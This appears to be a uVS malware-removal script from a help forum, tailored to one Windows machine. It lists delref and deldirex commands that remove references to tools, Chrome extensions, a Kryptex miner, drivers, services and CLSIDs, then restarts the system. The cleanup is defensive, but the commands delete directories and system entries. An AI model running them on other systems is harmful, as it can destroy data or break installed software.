delref Y:\SYSTEM\SYSTEMEXPLORER\SYSTEMEXPLORER.EXE delref Y:\SYSTEM\UNLOCKER\UNLOCKER.EXE delref Y:\SYSTEM\WINTOOLS.NET\WINTOOLS-NET.EXE delref Y:\SYSTEM\AUTOREG32\AUTOREG32.EXE delref Y:\SYSTEM\ANTIAUTORUN\ANTIAUTORUN.EXE delref Y:\SYSTEM\AUTORUNS\AUTORUNS.EXE delref Y:\SYSTEM\CS-STARTER\CS-STARTER.EXE delref Y:\SYSTEM\PRODUCTKEYEXPLORER\PRODUCTKEYEXPLORER.EXE delref Y:\SYSTEM\MPR\MPR.EXE delref Y:\SYSTEM\PRODUKEY\PRODUKEY.EXE delref Y:\SYSTEM\RECALL\RECALL.EXE delref Y:\SYSTEM\RECOVERKEYS\RECOVERKEYS.EXE delref Y:\SYSTEM\CCLEANER\CCLEANER.EXE delref Y:\SYSTEM\DISKCLEANER\DCLEANER.EXE delref Y:\SYSTEM\FCLEANER\FCLEANER.EXE delref Y:\SYSTEM\W-DISKCLEANER\WISEDISKCLEANER.EXE delref Y:\RECOVERY\ACTIVE@UTILITES\PASSWORDCHANGER.EXE delref Y:\PASSWORD\AFUWIN\AFUWIN.EXE delref Y:\PASSWORD\CMOSDEANIMATOR\CMOSDEANIMATOR.EXE delref Y:\PASSWORD\DREAMPACK\DREAMPACK.EXE delref Y:\PASSWORD\ESR\ESR.EXE delref Y:\PASSWORD\NTPWEDIT\NTPWEDIT.EXE delref Y:\PASSWORD\PASSWDRENEW\PASSWDRENEW.EXE delref Y:\PASSWORD\PASSRESET\PASSRESET.EXE delref Y:\PASSWORD\RECOVERPASSWORDS\RECOVERPASSWORDS.EXE delref Y:\PASSWORD\SAMINSIDE\SAMINSIDE.EXE delref Y:\PASSWORD\WINDOWSGATE\WINDOWSGATE.EXE delref Y:\PASSWORD\BIOS-MASTERPG\BIOS-MASTERPG.EXE delref Y:\PASSWORD\CMOSMANAGER\CMOS.EXE delref Y:\SYSTEM\FREEOTFE\FREEOTFE.EXE delref Y:\SYSTEM\OMZIFF\OMZIFF.EXE delref Y:\SYSTEM\TRUECRYPT\TRUECRYPT.EXE delref Y:\TEST\AIDA64\AIDA64.EXE delref Y:\TEST\ASTRA32\ASTRA32.EXE delref Y:\TEST\BEPRO230\BEPRO.EXE delref Y:\TEST\BATTERYMON\BATTERYMON.EXE delref Y:\TEST\SNM\SNM.EXE delref Y:\TEST\CPU-Z\CPUZ.EXE delref Y:\TEST\CPUBURN-IN\CPUBURN-IN.EXE delref Y:\TEST\HWMONITOR\HWMONITOR.EXE delref Y:\TEST\CRYSTALMARK\CRYSTALMARK.EXE delref Y:\TEST\DISKCHECK\DISKCHECK.EXE delref Y:\TEST\DISKMARK\DISKMARK.EXE delref Y:\TEST\DISPLAYX\DISPLAYX.EXE delref Y:\TEST\HD-SPEED\HD_SPEED.EXE delref Y:\TEST\HWINFO32\HWINFO32.EXE delref Y:\TEST\KEYBOARDTEST\KEYBOARDTEST.EXE delref Y:\TEST\LINX\LINX.EXE delref Y:\TEST\MEMTEST\MEMTEST.EXE delref Y:\TEST\RAMMON\RAMMON.EXE delref Y:\TEST\RAMTESTER\RT.EXE delref Y:\TEST\RMMA\RMMA.EXE delref Y:\TEST\SECURABLE\SECURABLE.EXE delref Y:\TEST\SIW\SIW.EXE delref Y:\TEST\SIV\SIV.EXE delref Y:\TEST\TFTTEST\TFTTEST.EXE delref Y:\TEST\TFTTEST\TTFTTEST.EXE delref Y:\TEST\EIZOTEST\EIZOTEST.EXE delref Y:\SYSTEM\WINSETUP2K10\WINSETUP2K10.EXE delref Y:\SYSTEM\78SETUP.CMD delref Y:\SYSTEM\ANTIWPA\WPA-KILL.EXE delref Y:\SYSTEM\NT5INSTALLER\NT5INSTALLER.EXE delref Y:\SYSTEM\NT6FAST\NT6FAST.EXE delref Y:\RECOVERY\SGI\SGI.EXE delref Y:\SYSTEM\WINNTSETUP\WINNTSETUP.EXE delref Y:\SYSTEM\WINNTSETUP\WINNTSETUP3.CMD delref Y:\UTILITES\ANTRENAMER\ANTRENAMER.EXE delref Y:\UTILITES\AUTOIT2EXE\AUT2EXE.EXE delref Y:\UTILITES\AUTOREN\AUTOREN.EXE delref Y:\UTILITES\BCOMPARE\BCOMPARE.EXE delref Y:\UTILITES\CLONESPY\CLONESPY.EXE delref Y:\UTILITES\DIRECTORYLP\DIRECTORYLP.EXE delref Y:\UTILITES\DOSBOX\DOSBOX.EXE delref Y:\UTILITES\FILELOCATOR\FILELOCATOR.EXE delref Y:\UTILITES\FILEALYZER\FILEALYZER.EXE delref Y:\UTILITES\FILECOMPARE\FILECOMPARE.EXE delref Y:\UTILITES\FREEFILESYNC\FREEFILESYNC.EXE delref Y:\UTILITES\HDDSCANNER\SCANNER.EXE delref Y:\UTILITES\IMAGEGREATOR\WIMIC.EXE delref Y:\UTILITES\IMGDISK\IMGDSK.EXE delref Y:\UTILITES\MOUSEEMU\MOUSEMU.EXE delref Y:\UTILITES\PEEDITOR\PEDITOR.EXE delref Y:\UTILITES\PEXPLORER\PEXPLORER.EXE delref Y:\UTILITES\PRINTFOLDER\PRINTFOLDER.EXE delref Y:\UTILITES\QUICKBFC\QUICKBFC.EXE delref Y:\UTILITES\RESHACKER\RESHACKER.EXE delref Y:\UTILITES\RESOURCEBINDER\RESBINDER.EXE delref Y:\UTILITES\RESTORATOR\RESTORATOR.EXE delref Y:\UTILITES\RENAME-IT\RNAME-IT.EXE delref Y:\UTILITES\SCROLLMOUSE\SCROLLMOUSE.EXE delref Y:\UTILITES\SEARCH&REPLACE\SNR.EXE delref Y:\UTILITES\SEARCHMYFILES\SEARCHMYFILES.EXE delref Y:\UTILITES\SIMPLEEYE\SIMPLEEYE.EXE delref Y:\UTILITES\TOUCAN\TOUCAN.EXE delref Y:\UTILITES\UVSCREENCAMERA\UVSCREENCAMERA.EXE delref Y:\UTILITES\VIRTUAL-FDD\VIRTUAL-FDD.EXE delref Y:\UTILITES\TWEAKER\TWEAKER.EXE delref Y:\UTILITES\VISTAUACMAKER\VISTAUACMAKER.EXE delref Y:\UTILITES\WINDIRSTAT\WINDIRSTAT.EXE delref Y:\UTILITES\KALKULES\KALKULES.EXE delref Y:\UTILITES\THECALC\THECALC.EXE delref Y:\UTILITES\MEASURE\MEASURE.EXE delref Y:\UTILITES\ONSCREENKEYBOARD\OSK.EXE delref %SystemRoot%\INSTALLER\{127F620C-AFB1-43CD-84D5-C51DAC99EF7F}\MICROINVESTUTILITY_45B7A774D53546E793C167AD687E88A4.EXE ;------------------------------------------------------------- restart

Код

------------

;uVS v4.0.10 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

deldirex %SystemDrive%\USERS\APTEM\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER

deldirex %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER

delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLIFBCIBLLHKDHOAFPJFNLHFPFGNPLDFL%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DODIJCGAFKHPOBJLNFDGIACPDENPMBGME%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DPHKDCINMMLJBLPNKOHLIPAIODLONPINF%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DPMPOAAHLECCAIBBHFJFIMIGEPMFMMBBK%26INSTALLSOURCE%3DONDEMAND%26UC
delref %SystemDrive%\USERS\APTEM\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PHKDCINMMLJBLPNKOHLIPAIODLONPINF\11.0.3_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PHKDCINMMLJBLPNKOHLIPAIODLONPINF\11.0.1_0\ПОИСК MAIL.RU
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DFCFENMBOOJPJINHPGGGODEFCCIPIKBPD%26INSTALLSOURCE%3DONDEMAND%26UC
delref %SystemDrive%\USERS\UPDATUSUSER\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\INTERNET EXPLORER (2).LNK
delref %SystemDrive%\USERS\UPDATUSUSER\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\INTERNET EXPLORER.LNK
apply

deltmp
delref {23E5D772-327A-42F5-BDEE-C65C6796BB2A}\[CLSID]
delref {177AFECE-9599-46CF-90D7-68EC9EEB27B4}\[CLSID]
delref {CEF51277-5358-477B-858C-4E14F0C80BF7}\[CLSID]
delref {59116E30-02BD-4B84-BA1E-5D77E809B1A2}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\RECUVA\RECUVA.EXE
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\RDVGKMD.SYS
delref {0D012ABD-CEED-11D2-9C76-00105AA73033}\[CLSID]
delref %SystemDrive%\USERS\APTEM\APPDATA\LOCALLOW\UNITY\WEBPLAYER\LOADER\UNITYWEBPLUGINAX.OCX
delref {56A58823-AE99-11D5-B90B-0050DACD1F75}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {E01D1C6A-4F40-11D3-8958-00105A272DCF}\[CLSID]
delref %Sys32%\MSSPELLCHECKINGFACILITY.DLL
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\TEMP\NKCPOPGGJCJKIICPENIKEOGIOEDNJEAC.CRX
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\BEELINE NETWORK MANAGER\UPDATER\CHP.EXE
delref %SystemRoot%\USB VIBRATION\7906\USB GAMEPAD.EXE -BOOT
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref {E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref VMMS\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref %SystemDrive%\PROGRAMDATA\APEXSQL\APEXSQLLOG\(LOCAL)\BINN\APEXSQLLOGSERVERHELPER.SYS
delref %Sys32%\DRIVERS\H647906.SYS
delref %Sys32%\DRIVERS\VBOXNETFLT.SYS
delref %Sys32%\PSXSS.EXE
delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_77\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES\MICROSOFT OFFICE\OFFICE12\OUTLCTL.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.145\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.5\PSMACHINE.DLL
delref %Sys32%\MSFLXGRD.OCX
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.111\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.165\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.153\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.135\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\ADOBE\ACROBAT READER DC\ACRORD32INFO.EXE
delref %SystemDrive%\PROGRAM FILES\EMBARCADERO\STUDIO\15.0\BIN\MIDAS.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.124\PSMACHINE.DLL
delref %Sys32%\SHAREMEDIACPL.CPL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.99\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.22.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRA~1\EMBARC~1\STUDIO\18.0\BIN\GETITH~1.DLL
delref G:\SETUP.EXE
delref {AE805869-2E5C-4ED4-8F7B-F1F7851A4497}\[CLSID]
delref L:\INSTALL_RADSTUDIO.EXE
delref M:\HTC_SYNC_MANAGER_PC.EXE
delref F:\AUTORUN.EXE
delref L:\AUTORUN.EXE
delref G:\INSTALL_RADSTUDIO.EXE
delref %SystemDrive%\PROGRAM FILES\GRAND THEFT AUTO IV\ROCKSTAR GAMES SOCIAL CLUB\RGSCLAUNCHER.EXE
delref {ADACAA8F-3595-47FE-9C31-9C7471B9BEC7}\[CLSID]
delref D:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
delref %SystemDrive%\PROGRAM FILES\EMBARCADERO\STUDIO\18.0\BIN\BDS.EXE
delref %SystemDrive%\PROGRAM FILES\FALCO.URL
delref %SystemDrive%\PROGRAM FILES\FREEGAMIA.URL
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\KRYPTEX\KRYPTEX.EXE
delref %SystemDrive%\PROGRAM FILES\MAKEMKV\MAKEMKV.URL
delref Y:\MEDIA\AIMP\AIMP2.EXE
delref Y:\HDD-UTILITES\CHECKDISK.EXE
delref Y:\HDD-UTILITES\CHKDSKGUI.EXE
delref Y:\MEDIA\POTPLAYER\POTPLAYER.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\FAR\FAR.EXE
delref Y:\UTILITES\NIRLAUNCHER\NIRLAUNCHER.EXE
delref Y:\MEDIA\MPC-BE\MPC-BE.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\TERACOPY\TERACOPY.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\TOTALCMD\TOTALCMD.EXE
delref Y:\CD-UTILITES\AMOK_BURNING\AMOK_DVD_BURNER.EXE
delref Y:\CD-UTILITES\CDROLLER\CDROLLER.EXE
delref Y:\CD-UTILITES\CDCHECK\CDCHECK.EXE
delref Y:\CD-UTILITES\CDSHOT\CDSHOT.EXE
delref Y:\CD-UTILITES\GBURNER\GBURNER.EXE
delref Y:\CD-UTILITES\IMGBURN\IMGBURN.EXE
delref Y:\CD-UTILITES\ISOBUSTER\ISOBUSTER.EXE
delref Y:\CD-UTILITES\MOBALIVE\MOBALIVE.EXE
delref Y:\CD-UTILITES\NERO\NERO.EXE
delref Y:\CD-UTILITES\OPTIDRIVECONTROL\OPTIDRIVECONTROL.EXE
delref Y:\CD-UTILITES\OSF-MOUNT\OSFMOUNT.EXE
delref Y:\CD-UTILITES\QEMUBOOTTESTER\QEMUBOOTTESTER.EXE
delref Y:\CD-UTILITES\SFILECOPIER\SFC.EXE
delref Y:\CD-UTILITES\ULTRAISO\ULTRAISO.EXE
delref Y:\CD-UTILITES\UNSTOPPABLECOPIER\UNSTOPCP.EXE
delref Y:\CD-UTILITES\WINIMAGE\WINIMAGE.EXE
delref Y:\CD-UTILITES\WINMOUNT\WINMOUNT.EXE
delref Y:\FLASH-UTILITES\ATTO-DISKBENCHMARK\BENCH32.EXE
delref Y:\SYSTEM\WINNTSETUP\BOOTICE.EXE
delref Y:\FLASH-UTILITES\BOOTICE\BOOTICE.EXE
delref Y:\FLASH-UTILITES\CHECKFLASH\CHECKFLASH.EXE
delref Y:\FLASH-UTILITES\CHECKUDISK\CHECKUDISK.EXE
delref Y:\FLASH-UTILITES\CHIPEASY\CHIPEASY.EXE
delref Y:\FLASH-UTILITES\FBINSTTOOL\FBINSTTOOL.EXE
delref Y:\FLASH-UTILITES\FBINST-FF\FLASHFORMAT_2K10_FBINST.EXE
delref Y:\FLASH-UTILITES\RMPREP-FF\FLASHFORMAT_2K10_RMPREP.EXE
delref Y:\FLASH-UTILITES\FM-TOOLKIT\FLASHMEMORYTOOLKIT.EXE
delref Y:\FLASH-UTILITES\FLASHNUL\FLASHNUL.EXE
delref Y:\FLASH-UTILITES\GETFLASHINFO\GETFLASHINFO.EXE
delref Y:\FLASH-UTILITES\GRUB4DOS\GRUBINST_GUI.EXE
delref Y:\FLASH-UTILITES\HPUSBFW\HPUSBFW.EXE
delref Y:\FLASH-UTILITES\IMAGEUSB\IMAGEUSB.EXE
delref Y:\FLASH-UTILITES\SDFORMATTER\SDFORMATTER.EXE
delref Y:\FLASH-UTILITES\MYDISKTEST\MYDISKTEST.EXE
delref Y:\FLASH-UTILITES\NTFS-DP\NTFS-DRIVEPROTECTION.EXE
delref Y:\FLASH-UTILITES\RMPREPUSB\RMPREPUSB.EXE
delref Y:\FLASH-UTILITES\RUFUS\RUFUS.EXE
delref Y:\FLASH-UTILITES\USB-SAFELYREMOVE\USB-SAFELYREMOVE.EXE
delref Y:\FLASH-UTILITES\USBDEVIEW\USBDEVIEW.EXE
delref Y:\FLASH-UTILITES\USBIDCHECK\USBIDCHECK.EXE
delref Y:\FLASH-UTILITES\WINCONTIG\WINCONTIG.EXE
delref Y:\FLASH-UTILITES\H2TEST\H2TESTW.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\HDHEX-EDITOR.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\KILLDISK.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\PARTMAN.EXE
delref Y:\HDD-UTILITES\AOMEI_PA\P_ASSISTANT.EXE
delref Y:\HDD-UTILITES\DDMANAGER\DDMANAGER.EXE
delref Y:\HDD-UTILITES\DLG-DIAGNOSTICS\DLG-DIAGNOSTICS.EXE
delref Y:\HDD-UTILITES\DCHANGER\DCHANGER.EXE
delref Y:\HDD-UTILITES\DEFRAGGLER\DEFRAGGLER.EXE
delref Y:\HDD-UTILITES\DFSEE\DFSEE.EXE
delref Y:\HDD-UTILITES\DMDE\DMDE.EXE
delref Y:\HDD-UTILITES\DISKSMARTVIEW\DISKSMARTVIEW.EXE
delref Y:\RECOVERY\TESTDISK\TESTDISK.EXE
delref Y:\HDD-UTILITES\DRIVEMAN\DRIVEMAN.EXE
delref Y:\HDD-UTILITES\EASEUS-PM\EASEUS-PM.EXE
delref Y:\HDD-UTILITES\HDSENTINEL\HDSENTINEL.EXE
delref Y:\HDD-UTILITES\LLF-TOOL\LLFTOOL.EXE
delref Y:\HDD-UTILITES\HDD-SCAN\HDDSCAN.EXE
delref Y:\HDD-UTILITES\HDHACKER\HDHACKER.EXE
delref Y:\HDD-UTILITES\HDTUNEPRO\HDTUNEPRO.EXE
delref Y:\HDD-UTILITES\MYDEFRAG\MYDEFRAG4.EXE
delref Y:\HDD-UTILITES\PARAGON-HDM\PARAGON-AT.EXE
delref Y:\HDD-UTILITES\PARAGON-HDM\PARAGON-HDM.EXE
delref Y:\HDD-UTILITES\PARAGON-HDMP\PHDM15P.EXE
delref Y:\HDD-UTILITES\PARTITIONGURU\PARTITIONGURU.EXE
delref Y:\HDD-UTILITES\PARTITIONWIZARD\PARTITIONWIZARD.EXE
delref Y:\HDD-UTILITES\SMARTVISION\SMARTVISION.EXE
delref Y:\HDD-UTILITES\ULTIMATEDEFRAG\UDEFRAG.EXE
delref Y:\HDD-UTILITES\ULTRADEFRAG\ULTRADEFRAG.EXE
delref Y:\HDD-UTILITES\VICTORIA\VICTORIA.EXE
delref Y:\HDD-UTILITES\VOPT\VOPT.EXE
delref Y:\HDD-UTILITES\AUSLOGICS\DISKDEFRAG.EXE
delref Y:\ANTIVIR\ADWCLEANER\ADWCLEANER.EXE
delref Y:\ANTIVIR\ANTIDUST\ANTIDUST.EXE
delref Y:\ANTIVIR\ANTISMS\ANTISMS3.EXE
delref Y:\ANTIVIR\ANTISMS\ANTISMS.EXE
delref Y:\ANTIVIR\AVZ\START.EXE
delref Y:\ANTIVIR\ANTIWINLOCKER\ANTIWINLOCKER.EXE
delref Y:\ANTIVIR\ANVIR\ANVIR.EXE
delref Y:\ANTIVIR\DRCUREIT\DRCUREIT-HDD.CMD
delref Y:\ANTIVIR\DRCUREIT\UPDATE.CMD
delref Y:\ANTIVIR\DRCUREIT\DRCUREIT.CMD
delref Y:\ANTIVIR\HIJACKTHIS\HIJACKTHIS.EXE
delref Y:\ANTIVIR\KASPERSKYVRT\KASPERVRT.CMD
delref Y:\ANTIVIR\KASPERSKYVRT\KASPERVRT-HDD.CMD
delref Y:\ANTIVIR\KASPERSKYVRT\UPDATE.CMD
delref %Sys32%\RUNSCANNER.CMD
delref Y:\ANTIVIR\BHOREMOVER\BHOREMOVER.EXE
delref Y:\ANTIVIR\UVS\UVS.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\2K10\7-ZIP\7ZFM.EXE
delref Y:\ARHIVERS\7-ZIP\7-ZIP.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\7-ZIP\7ZFM.EXE
delref Y:\ARHIVERS\78REPACK\78REPACK.EXE
delref Y:\ARHIVERS\7ZSFX-BUILDER\7ZSFX-BUILDER.EXE
delref Y:\ARHIVERS\7ZSPLIT\7ZSPLIT.EXE
delref Y:\ARHIVERS\ARID\ARIDG.EXE
delref Y:\ARHIVERS\EASYUHA\EASYUHA.EXE
delref Y:\ARHIVERS\SPLITTER\SPLITTER.EXE
delref Y:\ARHIVERS\MOLESVPC\MOLESVPC.EXE
delref Y:\ARHIVERS\PE-COMPACT\PE-COMPACT.EXE
delref Y:\ARHIVERS\TROLOPATCH\TROLOPATCH.EXE
delref Y:\ARHIVERS\UNIEXTRACT\UNIEXTRACT.EXE
delref Y:\ARHIVERS\UPX-X-SHELL\UPXXSHELL.EXE
delref Y:\ARHIVERS\WINRAR\WINRAR.EXE
delref Y:\ARHIVERS\WINUHA\WINUHA.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\FILERECOVERY.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\UNDELETE.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\UNERASER.EXE
delref Y:\RECOVERY\CHKREPAIR\CHKREPAIR.EXE
delref Y:\RECOVERY\EASEUS-DRW\EASEUS-DRW.EXE
delref Y:\RECOVERY\EASYRECOVERY\EASYRECOVERY.EXE
delref Y:\RECOVERY\UFS-EXPLORER\UFS-EXPLORER.EXE
delref Y:\RECOVERY\GETDATABACK\GETDATABACK.EXE
delref Y:\RECOVERY\R.SAVER\R.SAVER.EXE
delref Y:\RECOVERY\RECOVERMF\RECOVERMYFILES.EXE
delref Y:\RECOVERY\RECUVA\RECUVA.EXE
delref Y:\RECOVERY\ZAR\ZAR.EXE
delref Y:\BOOTRECOVERY\BCDTOOL\BCDTOOL.EXE
delref Y:\BOOTRECOVERY\BELLAVISTA\BELLAVISTA.EXE
delref Y:\BOOTRECOVERY\BOOTBUILDER\BOOTBUILDER.EXE
delref Y:\BOOTRECOVERY\BOOTSECTGUI\BOOTSECTGUI.EXE
delref Y:\BOOTRECOVERY\FIXBOOTFULL\FIXBOOTFULL.EXE
delref Y:\BOOTRECOVERY\MBRCHECK\MBRCHECK.EXE
delref Y:\BOOTRECOVERY\MULTIBOOT\MULTIBOOT.EXE
delref Y:\BOOTRECOVERY\MBRFIX\UMBRGUI.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\UNFORMAT.EXE
delref Y:\RECOVERY\CAPTAINNEMO\NEMO.EXE
delref Y:\RECOVERY\DISKEXPLORER\DEXPLORER-NTFS.EXE
delref Y:\RECOVERY\EASSOS-RECOVERY\E_RECOVERY.EXE
delref Y:\RECOVERY\EXT2MGR\EXT2MGR.EXE
delref Y:\RECOVERY\HDD-RAWCOPY\RAWCOPY.EXE
delref Y:\RECOVERY\O&O-DISKRECOVERY\O&O-DISKRECOVERY.EXE
delref Y:\RECOVERY\FINDANDMOUNT\FINDANDMOUNT.EXE
delref Y:\RECOVERY\PTDD\PTDWIN.EXE
delref Y:\RECOVERY\RAID-RECONSTRUCTOR\RAIDRECONSTRUCTOR.EXE
delref Y:\RECOVERY\TRANSMAC\TRANSMAC.EXE
delref Y:\RECOVERY\ACTIVE@UTILITES\DISKIMAGE.EXE
delref Y:\RECOVERY\A_BACKUPPER\A_BACKUPPER.EXE
delref Y:\RECOVERY\DRIVECLONERRX\DRIVECLONERRX.EXE
delref Y:\RECOVERY\DRIVESNAPSHOT\SNAPSHOT.EXE
delref Y:\RECOVERY\EASSOS-SR\E_SYSTEMRESTORE.EXE
delref Y:\RECOVERY\FAB'SAUTOBACKUP\AUTOBACKUP.EXE
delref Y:\RECOVERY\GIMAGEX\GIMAGEX.EXE
delref Y:\RECOVERY\HDCLONE\HDCLONE.EXE
delref Y:\RECOVERY\R-DRIVE\R-DRIVEIMAGE.EXE
delref Y:\RECOVERY\REFLECTPE\REFLECTPE.EXE
delref Y:\RECOVERY\DRIVEIMAGE-XML\DRIVEIMAGE-XML.EXE
delref Y:\RECOVERY\SHADOWPROTECT\SHADOWPROTECTPE.EXE
delref Y:\RECOVERY\SKYIAR\SKYIAR.EXE
delref Y:\RECOVERY\GHOST\GHOST32.EXE
delref Y:\RECOVERY\TERABYTEIMAGE\TERABYTEIMAGE.EXE
delref Y:\GRAPHICS\ACDSEE\ACDSEE32.EXE
delref Y:\GRAPHICS\ARTICONS\ARTICONS.EXE
delref Y:\GRAPHICS\CAPTURETEXT\CAPTURETEXT.EXE
delref Y:\GRAPHICS\FSCAPTURE\FSCAPTURE.EXE
delref Y:\GRAPHICS\FSVIEWER\FSVIEWER.EXE
delref Y:\GRAPHICS\IMAGEUPLOADER\IMAGEUPLOADER.EXE
delref Y:\GRAPHICS\IRFANVIEW\I_VIEW32.EXE
delref Y:\GRAPHICS\KCHMVIEWER\KCHMVIEWER.EXE
delref Y:\GRAPHICS\SUMATRA-PDF\SUMATRAPDF.EXE
delref Y:\GRAPHICS\PDFXCVIEW\PDFXCVIEW.EXE
delref Y:\GRAPHICS\PHOTOFILTRE\PHOTOFILTRE.EXE
delref Y:\GRAPHICS\PICPICK\PICPICK.EXE
delref Y:\GRAPHICS\STDU-VIEWER\STDUVIEWERAPP.EXE
delref Y:\GRAPHICS\SYSEXP\SYSEXP.EXE
delref Y:\GRAPHICS\GIFANIMATOR\GIFANIMATOR.EXE
delref Y:\GRAPHICS\WINDJVIEW\WINDJVIEW.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\XNVIEW\XNVIEW.EXE
delref Y:\DRIVERS\CHECKDEVICE\CHECKDEVICE.EXE
delref Y:\DRIVERS\DEVMANVIEW\DEVMANVIEW.EXE
delref Y:\DRIVERS\DOUBLEDRIVER\DOUBLEDRIVER.EXE
delref Y:\DRIVERS\DRIVEXP\DRIVEXP.EXE
delref Y:\DRIVERS\DRIVERINJECTION\DRIVERINJECTION.EXE
delref Y:\DRIVERS\DRIVERSWEEPER\DRIVERSWEEPER.EXE
delref Y:\DRIVERS\DRIVERVIEW\DRIVERVIEW.EXE
delref Y:\DRIVERS\GETPEDRIVER\GETPEDRIVER.EXE
